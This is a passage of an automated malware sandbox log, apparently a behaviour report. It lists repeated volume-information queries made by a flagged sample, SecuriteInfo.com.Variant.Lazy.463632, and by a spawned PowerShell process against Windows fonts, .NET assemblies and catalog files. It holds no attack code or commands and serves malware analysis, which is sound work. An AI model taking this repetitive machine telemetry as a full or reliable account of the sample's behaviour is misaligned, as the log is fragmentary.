                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
